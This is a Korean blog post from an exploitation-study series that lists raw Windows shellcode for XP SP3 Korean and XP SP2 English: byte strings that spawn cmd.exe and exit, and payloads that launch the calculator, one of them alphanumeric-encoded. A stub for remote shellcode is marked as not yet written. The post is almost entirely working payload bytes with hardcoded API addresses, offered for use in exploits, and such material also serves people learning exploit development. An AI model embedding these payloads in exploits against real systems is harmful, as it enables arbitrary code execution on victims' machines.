티스토리 뷰

System/Windows

Windows Shellcode

Tribal 2016. 1. 30. 15:11

XP SP3 Kor Local


cmd.exe 실행 및 exit() : 80 byte

1
2
3
4
5
6
"\x55\x8B\xEC\x83\xEC\x44\x33\xC0\xC6\x44\x24\x04\x63\xC6\x44"
"\x24\x05\x6D\xC6\x44\x24\x06\x64\x88\x44\x24\x07\x6A\x05\x8D"
"\x44\x24\x08\x50\xC6\x44\x24\x04\xAD\x90\xC6\x44\x24\x05\x23"
"\x90\xC6\x44\x24\x06\x86\x90\xC6\x44\x24\x07\x7C\x90\x8B\x44"
"\x24\x04\x90\x90\x90\x90\x90\xFF\xD0\xD0\x6A\x01\xB8\xFA\xCA"
"\x81\x7C\xFF\xD0\xD0"
cs


계산기 실행

1
2
3
4
5
6
7
8
9
10
"\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
"\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
"\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
"\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
"\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
"\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
"\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
"\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
"\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
"\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43"
cs



XP SP3 Remote


아직 없음...



XP SP2 En Local


cmd.exe 실행 및 exit() : 40 byte

1
2
3
"\x55\x8B\xEC\x33\xDB\x53\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6"
"\x45\xFE\x64\x6A\x05\x8D\x45\xFC\x50\xB8\x4D\x11\x86\x7C\xFF"
"\xD0\x6A\x01\xB8\xA2\xCA\x81\x7C\xFF\xD0"
cs


계산기 실행 : 343 byte

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x34\x4e\x33\x4b\x58\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x58"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x58\x42\x44\x4e\x50\x4b\x38\x42\x57\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x50\x57\x4a\x4d\x44\x4e\x43\x47\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36"
"\x4e\x36\x43\x46\x42\x50\x5a"
cs



계속 만드는 중....

저작자표시 비영리

'System > Windows' 카테고리의 다른 글

Windows ROP  (2) 2016.02.12
Windows SEH Overwrite  (0) 2016.02.11
Windows Stack OverFlow  (0) 2016.02.11
세그먼테이션(Segmentation) 정리  (2) 2016.01.30
Windows 보안 기법  (0) 2015.12.29
공유하기 링크
댓글
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31